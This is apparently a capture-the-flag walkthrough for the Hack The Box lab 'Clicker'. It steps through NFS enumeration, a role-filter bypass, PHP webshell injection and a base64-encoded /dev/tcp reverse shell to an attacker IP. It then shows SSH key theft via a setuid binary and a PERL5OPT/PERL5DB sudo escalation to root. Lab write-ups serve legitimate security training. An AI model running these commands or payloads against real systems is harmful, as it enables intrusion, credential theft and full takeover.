22,80,111,2049,39319,41095,46873,48073,60887
10.129.62.93 clicker.htb
http://clicker.htb/login.php http://clicker.htb/play.php http://clicker.htb/info.php http://clicker.htb/export.php rhttp://clicker.htb/register.php
register an account ivan:123456
PHPSESSID=2cgonbun427jaletnuemcdl8a1
because i see nfs services open in nmap port scan, let’s see if there is any possible mounting folder.
showmount -e 10.129.62.93
mount -t nfs 10.129.62.93:/mnt/backups /mnt -o nolock
i get a zip file called
clicker.htb_backup.zip
, copy and unzip it in a new folderit seems the source code of the web application clicker.
credentials for sql database.
localhost clicker_db_user:clicker_db_password DB= clicker
Let’s see the close and save function on web apps
‘role’ is being filtered as malicious words
Let’s see how to bypass the filter
header injection
try it out
redirection
logout and then login back
here comes a new functionality called administration
we can see the export path in this new functionality
modification in extension is controlled by export.php
try to access export path:
exports/top_players_bz6cuda5.php
the uploaded file is accessible
in authenticate.php, parameter ‘nickname’ seems injectable with webshell.
play the game again, add parameter nickname as webshell
export it in administration
http://clicker.htb/exports/top_players_82ifz4pn.php?cmd=whoami
webshell is accessible
http://clicker.htb/exports/top_players_82ifz4pn.php?cmd=cat%20/etc/passwd%20|%20grep%20-v%20nologin
we can see some user name of the server
echo "sh -i >& /dev/tcp/10.10.14.12/6666 0>&1" | base64 c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTIvNjY2NiAwPiYx
create reverse shell ,encoded by base64 and URL encode
echo%20%22c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTIvNjY2NiAwPiYx%22%20%7C%20base64%20-d%20%7C%20bash
get the reverseshell
after enumeration, we get into /opt folder
execute_query: setuid, setgid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=cad57695aba64e8b4f4274878882ead34f2b2d57, for GNU/Linux 3.2.0, not stripped
download and open it by ghidra
in main funciton(),we can see inside the switch cases “default”
param_2
stands for the second arguemnt, let’s have a try in the file.it seems all number for
param_1
besides (0-4) can be ran as execute files. and param_2
specifies the filename arguments. it is reading file content. by the way, this program seems have privilege to access file that included in the same folder with some
.sql
file which is not accessible by our current user privilege. Then after enumeration
./execute_query 6 ../.ssh/id_rsa
we can get the private key for user jack’s authentication
Because the openssh format is not correct from what we copy directly, add two ‘-’ to correct the format.
get the access of user jack
jack@clicker:~$ sudo -l Matching Defaults entries for jack on clicker: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty User jack may run the following commands on clicker: (ALL : ALL) ALL (root) SETENV: NOPASSWD: /opt/monitor.sh
jack@clicker:~$ cat /opt/monitor.sh #!/bin/bash if [ "$EUID" -ne 0 ] then echo "Error, please run as root" exit fi set PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin unset PERL5LIB; unset PERLLIB; data=$(/usr/bin/curl -s http://clicker.htb/diagnostic.php?token=secret_diagnostic_token); /usr/bin/xml_pp <<< $data; if [[ $NOSAVE == "true" ]]; then exit; else timestamp=$(/usr/bin/date +%s) /usr/bin/echo $data > /root/diagnostic_files/diagnostic_${timestamp}.xml fi
/usr/bin/xml_pp
googling
we find a exploit called perl_startup
here shows the detail of payload
cmd_exec(%Q{PERL5OPT=-d PERL5DB='exec "/bin/bash"' exim -ps 2>&-})
let’s back to the target
sudo PERL5OPT=-d PERL5DB='exec "chmod u+s /bin/bash"' /opt/monitor.sh bash -p
get the root